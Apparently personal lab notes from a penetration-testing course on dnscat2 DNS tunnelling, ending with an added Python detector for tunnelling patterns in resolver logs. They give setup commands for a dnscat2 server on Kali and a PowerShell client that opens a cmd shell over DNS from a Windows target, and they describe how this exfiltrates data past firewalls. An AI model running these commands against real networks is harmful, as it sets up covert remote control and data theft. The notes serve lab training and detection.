# Introduction

- `dnscat2` is a tunneling tool that uses DNS to send data between two hosts
- Uses an encrypted C2 channel and carries its data inside TXT records within the DNS protocol
- Usually, every AD domain environment has its own DNS server, which resolves hostnames to IP addresses and forwards queries it cannot answer to external DNS servers
- When using `dnscat2`, address resolution is requested from an external server (the `dnscat2` server)
- When the local DNS server tries to resolve that address, the data is exfiltrated over the network in place of a legitimate DNS request
- `dnscat2` can be an extremely stealthy approach to exfiltrating data while evading firewall detection, which relies on stripping (intercepting) HTTPS connections to sniff traffic and does not cover DNS in the same way

# Sequence for `dnscat2`

- Install and set up the `dnscat2` server on the Kali host

```bash
# clone repo and install on Kali host
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install

# start dnscat2 server on Kali host
sudo ruby dnscat2.rb --dns host=<kali_host_ip>,port=53,domain=inlanefreight.local --no-cache
```

- A secret key is generated that we need to take note of to set up the client on the Windows target
- Download `dnscat2.ps1` and move it to the Windows target

```bash
git clone https://github.com/lukebaggett/dnscat2-powershell.git
# serve the directory containing dnscat2.ps1 from the Kali host and download it onto the Windows target
```

- Once we have `dnscat2.ps1` on the Windows target, import the script and start a tunnel

```powershell
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver <kali_host_ip> -Domain inlanefreight.local -PreSharedSecret <secret_key> -Exec cmd
```

- Confirm the session is established on the Kali host
![[images/Pasted image 20251023092702.png]]
- List options with `?`
![[images/Pasted image 20251023092750.png]]
- We can use `dnscat2` to interact with sessions and move further into a target environment
- To attach to a session, use the following command in `dnscat2`: `window -i <number>`
![[images/Pasted image 20251023092855.png]]

# Exercise

- Ping and light nmap scan of the target
![[images/Pasted image 20251023093126.png]]
![[images/Pasted image 20251023093132.png]]
- Clone and install `dnscat2` on the Kali host
![[images/Pasted image 20251023093326.png]]
- Set up `dnscat2` on the Kali host and note the secret key
![[images/Pasted image 20251023093357.png]]
- Clone `dnscat2.ps1`
![[images/Pasted image 20251023093627.png]]
- RDP connect to the target
![[images/Pasted image 20251023094036.png]]
- Move `dnscat2.ps1` to the target
![[images/Pasted image 20251023094447.png]]
- Import the script and start the tunnel on the Windows target
![[images/Pasted image 20251023095239.png]]
- Confirm on the Kali host and attach to the session
![[images/Pasted image 20251023095348.png]]
- This console session is very unstable
![[images/Pasted image 20251023095601.png]]
- Not a fan of this tool
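The Introduction describes what the tunnel looks like from the resolver's side: a stream of TXT queries for long, encoded subdomain labels under a single domain, relayed outward by the internal DNS server. The script below is an added example written for these notes (it is not part of `dnscat2` or the course material) that applies those indicators to resolver query-log lines. The log lines are constructed, the BIND-style `query:` format is an assumption, and the thresholds are illustrative rather than tuned; `inlanefreight.local` is reused from the lab setup above.

```python
"""Heuristic detector for DNS-tunnelling-style query patterns.

Added example, not part of dnscat2 or the original notes. Reads
resolver query-log lines, groups queries by base domain, and flags
domains whose queries look like encoded data rather than hostname
lookups: many distinct, long, high-entropy subdomains with a high
share of TXT queries. Thresholds are illustrative assumptions.
"""
import math
import re
from collections import defaultdict

# Constructed sample log lines in an assumed BIND-style "query:" format.
# The five 32-hex-character labels stand in for encoded tunnel payloads.
SAMPLE_LOG = """\
client 10.10.14.5#53211: query: www.example.com IN A +
client 10.10.14.5#53211: query: mail.example.com IN MX +
client 10.10.14.22#49160: query: 0f3a9c1e7b2d4a6e8f01c3b5d7e9f1a2.inlanefreight.local IN TXT +
client 10.10.14.22#49161: query: 9d7e2b4c6a8f0e1d3c5b7a9f2e4d6c8b.inlanefreight.local IN TXT +
client 10.10.14.22#49162: query: a1c3e5f7b9d2e4f6a8c0b2d4e6f8a1c3.inlanefreight.local IN TXT +
client 10.10.14.22#49163: query: 4b6d8f0a2c4e6f8b0d2f4a6c8e0b2d4f.inlanefreight.local IN TXT +
client 10.10.14.22#49164: query: e7f9a1b3c5d7e9f1a3b5c7d9e1f3a5b7.inlanefreight.local IN TXT +
client 10.10.14.7#51002: query: updates.example.com IN A +
"""

QUERY_RE = re.compile(r"query: (?P<qname>\S+) IN (?P<qtype>[A-Z]+)")


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname):
    """Return (subdomain_part, base_domain).

    Assumption: the base domain is the last two labels; a real deployment
    would use a public-suffix list instead of this shortcut."""
    labels = qname.rstrip(".").split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text):
    """Yield (qname, qtype) for every line that matches QUERY_RE."""
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group("qname"), m.group("qtype")


def analyze(log_text, min_queries=3, min_txt_ratio=0.5,
            min_avg_len=20, min_entropy=3.5):
    """Return {base_domain: stats} for domains that trip every threshold.

    The defaults are assumptions chosen for the constructed sample; tune
    them against your own resolver's baseline before alerting on them.
    """
    per_domain = defaultdict(lambda: {"total": 0, "txt": 0,
                                      "subs": set(), "entropy": []})
    for qname, qtype in parse_log(log_text):
        sub, base = split_qname(qname)
        st = per_domain[base]
        st["total"] += 1
        if qtype == "TXT":
            st["txt"] += 1
        if sub:
            st["subs"].add(sub)
            # Entropy of the label characters only, dots removed.
            st["entropy"].append(shannon_entropy(sub.replace(".", "")))

    flagged = {}
    for base, st in per_domain.items():
        if st["total"] < min_queries or not st["subs"]:
            continue
        txt_ratio = st["txt"] / st["total"]
        avg_len = sum(len(s) for s in st["subs"]) / len(st["subs"])
        avg_entropy = sum(st["entropy"]) / len(st["entropy"])
        if (txt_ratio >= min_txt_ratio and avg_len >= min_avg_len
                and avg_entropy >= min_entropy):
            flagged[base] = {"queries": st["total"], "txt_ratio": txt_ratio,
                             "unique_subdomains": len(st["subs"]),
                             "avg_label_len": avg_len,
                             "avg_entropy": round(avg_entropy, 2)}
    return flagged


if __name__ == "__main__":
    for domain, stats in analyze(SAMPLE_LOG).items():
        print(f"suspicious tunnelling pattern: {domain} {stats}")
```

On the constructed sample, `example.com` stays clear (short labels, no TXT queries) and `inlanefreight.local` is flagged on all three indicators. In practice the per-domain volume over time matters as much as label shape, because the same resolver relay that makes the tunnel invisible to HTTPS inspection also concentrates every tunneled byte into the internal DNS server's query log, which is where this kind of check belongs.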